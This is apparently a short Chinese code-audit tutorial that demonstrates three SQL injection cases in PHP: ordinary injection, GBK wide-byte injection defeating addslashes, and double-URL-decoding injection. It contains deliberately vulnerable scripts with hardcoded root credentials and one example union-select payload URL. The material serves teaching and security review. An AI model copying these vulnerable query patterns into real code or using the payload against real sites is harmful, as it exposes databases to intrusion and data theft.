普通注入

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
header('content-type: text/html; charset=utf-8');
$id = $_GET['id'];
$conn = mysqli_connect('localhost',"root",'root','test');
$sql = "select * from user where id={$id}";
$result = $conn->query($sql);
if($conn->connect_error) {
	die('数据库连接失败:' . $conn->connect_error);
}
var_dump('当前SQL语句是:' . $sql . "<br />");
@print_r(mysqli_fetch_row($result));

宽字节注入

gbk编码会把两个字节合并为一个汉字,因为汉字是个多字节组成,从而把用来过滤的\合并,造成了sql语句的闭合。

例子:http://localhost/audit/sql1.php?id=%df%27%20union%20select%201,2%20--+

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
header("Content-type:text/html;charset=gbk");
$conn=mysqlI_connect('localhost','root','root','test');
if($conn->connect_error) {
	die('数据库连接失败:' . $conn->connect_error);
}
$conn->query("set names 'gbk'");
$id = addslashes($_GET['id']);
$sql = "select * from abc where id='$id'";
$result = $conn->query($sql);
var_dump('当前sql是:' . $sql . "<br/>");
@print_r(mysqli_fetch_row($result));

二次注入

二次注入可以绕过gpc进行注入,urldecode函数会将%2527解码为单引号.%25解码是%在二次时为%+原来的27为单引号。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
header('content-type: text/html; charset=utf-8');
$id = addslashes($_GET['id']);
$id2 = urldecode($id);
$conn = mysqli_connect('localhost',"root",'root','test');
$sql = "select * from user where id={$id2}";
$result = $conn->query($sql);
if($conn->connect_error) {
	die('数据库连接失败:' . $conn->connect_error);
}
var_dump('当前SQL语句是:' . $sql . "<br />");
@print_r(mysqli_fetch_row($result));